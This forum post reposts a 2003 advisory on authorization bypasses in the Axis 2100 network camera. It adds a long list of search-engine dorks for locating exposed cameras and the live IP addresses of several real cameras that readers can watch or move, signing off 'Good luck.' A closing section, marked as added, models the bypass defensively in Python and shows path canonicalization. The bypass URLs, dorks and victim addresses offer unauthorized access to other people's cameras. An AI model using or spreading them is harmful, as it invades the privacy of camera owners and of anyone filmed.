Moj Sazan Group Forum

Full version: Authorization Bypass in Network Cameras
Hello,

There is a small hole in the Axis 2100 Network Camera line of network cameras.

I thought I would post it here for general awareness.

It is nothing fancy, just a very simple issue. I brought it up so that if you install cameras somewhere,

you also think about security. That's all.


Exploit
Code:
#######################################################################

Device:           Axis 2100 Network Camera 2.31  - Multiple Vulnerabilities
Application/Server:    Boa/0.92o / Foundry Networks/2.20
Vendors:         http://www.axis.com
Versions:        <= 2.31
Platforms:       Windows
Bug:                 Authorization Bypass, Internal I.P Exposure, Password Encryption Algorithm  Exposure
Risk:                High
Exploitation:   remote with browser
Date:               25 Dec 2003
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@mail.com
web:                http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bugs
3) The Code

#######################################################################

===============
1) Introduction
===============

The AXIS 2100 Network Camera offers crisp, quality images and streaming video
from anywhere on your network. It lets you keep a close eye on the world around
you, or show your part of it through the Web.

With a built-in high performance Web server, no PC is required. The network camera
can operate as a standalone or be placed wherever there is a LAN or Internet connection,
or an available modem.

#######################################################################

======
2) Bug
======

In order to see any page the server requires authentication, as it should.
But why use a standard "HTTP Basic Authorization" that any script kiddie
can Brute Force instead of the java login authentication that the server contains?!

The server is safe against XSS and Directory Traversal, which can help an attacker
retrieve the machine's password, but who needs it when you can just
BYPASS THE AUTHORIZATION BY REFERRING TO THE FOLDER "/admin/".
It is ridiculous that although an attacker can bruteforce, he doesn't have to
because he can just walk right into the system, change anything and even retrieve the password.

Another way to BYPASS THE AUTHORIZATION is by referring to folders with double "//"
for example:
http://<host>//view/index.shtml

Another less concerning hole in the server is the exposure of the machine's Internal IP
inside one of the demo files, such as /demo/edu640x480jav.shtml.

In addition to all this the password encryption algorithm is exposed in the file /java/users.shtml.

Further directory listing is available for "/java" and "/pics".

#######################################################################

===========
3) The Code
===========

1) Authorization Bypass - http://<host>/admin/
2) Authorization Bypass - http://<host>//view/index.shtml
3) Internal I.P Exposure - http://<host>/demo/edu640x480jav.shtml
4) Password Encryption Algorithm  - http://<host>/java/users.shtml

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."  

For dorks, you can also use:
Code:
inurl:indexFrame.shtml Axis
inurl:"ViewerFrame?Mode="
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:"sony network camera snc-p1"
intitle:"sony network camera snc-m1"
site:.viewnetcam.com -www.viewnetcam.com
intitle:"Toshiba Network Camera" user login
intitle:"netcam live image"
intitle:"i-Catcher Console - Web Monitor"
inurl:/home/home
"Kamerainformationen anzeigen"
intitle:"AXIS 2100 Network Camera Axis 2100 Network Camera 2.02"
intitle:"Linksys Web Camera" "ver"
inurl:/view/index.shtml
inurl:netw_tcp.shtml
intitle:"supervisioncam protocol"
inurl:CgiStart?page=Single
inurl:indexFrame.shtml?newstyle=Quad
intitle:liveapplet inurl:LvAppl
inurl:/showcam.php?camid
inurl:video.cgi?resolution=
inurl:image?cachebust=
intitle:"Live View / - AXIS"
inurl:view/view.shtml
intext:"MOBOTIX M1"
intext:"Open Menu"
intitle:snc-rz30
inurl:home/
inurl:"MultiCameraFrame?Mode="
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live NetSnap Cam-Server feed"
intitle:"Live View / - AXIS 206M"
intitle:"Live View / - AXIS 206W"
intitle:"Live View / - AXIS 210"
inurl:"MultiCameraFrame?Mode=Motion"
intitle:start inurl:cgistart
intitle:"WJ-NT104 Main Page"
intext:"MOBOTIX M1" intext:"Open Menu"
intext:"MOBOTIX M10" intext:"Open Menu"
intext:"MOBOTIX D10" intext:"Open Menu"

For example:



This can be dangerous; for example, look at this:
http://141.213.21.87/view/view.shtml?id=...jpg&size=1

Or, for example, you can even move the camera:
http://210.175.242.113/ViewerFrame?Mode=...Language=0
http://61.119.240.67/ViewerFrame?Mode=Motion&Language=0

Some are interesting too:
http://63.138.232.19/view/view.shtml?id=...jpg&size=1

Good luck.
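
The advisory quoted in the post does not say why `/admin/` and `//view/index.shtml` skip the login. As an added example (not part of the original post and not the camera's firmware), the Python model below assumes a common cause, a deny-list matched against the raw request path, and contrasts it with a default-deny check on the canonical path. The policy sets, function names and sample targets are hypothetical.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed policy for illustration only; not taken from the camera firmware.
NAIVE_PROTECTED = ("/view/", "/java/")   # deny-list that forgot /admin/
PUBLIC_PATHS = {"/", "/index.shtml"}     # hypothetical anonymous pages


def naive_requires_auth(raw_target: str) -> bool:
    """Weak: deny-list matched against the raw, un-normalised request target."""
    return raw_target.startswith(NAIVE_PROTECTED)


def canonical_path(raw_target: str) -> str:
    """Reduce a request target to the path a file-serving layer would resolve."""
    # Split by hand: urlsplit() would parse "//view/..." as a network location.
    path = raw_target.split("?", 1)[0].split("#", 1)[0]
    path = unquote(path)
    if "\x00" in path or not path.startswith("/"):
        raise ValueError("malformed request path")
    path = re.sub(r"/+", "/", path)      # "//view" -> "/view"
    return posixpath.normpath(path)      # resolves "." and ".." segments


def hardened_requires_auth(raw_target: str) -> bool:
    """Default deny: everything needs authentication unless explicitly public."""
    try:
        return canonical_path(raw_target) not in PUBLIC_PATHS
    except ValueError:
        return True


SAMPLES = [  # constructed request targets, modelled on the paths in the advisory
    "/view/index.shtml",
    "//view/index.shtml",
    "/admin/",
    "/java/users.shtml",
    "/index.shtml",
]


def compare(targets=SAMPLES):
    """Return (target, naive_decision, hardened_decision) for each target."""
    return [(t, naive_requires_auth(t), hardened_requires_auth(t)) for t in targets]


if __name__ == "__main__":
    for target, naive, hardened in compare():
        print(f"{target:22} naive_auth={naive!s:5} hardened_auth={hardened}")
```

The same canonical form should be the one the server uses to locate the file, so the access decision and the file lookup cannot disagree about which resource was requested.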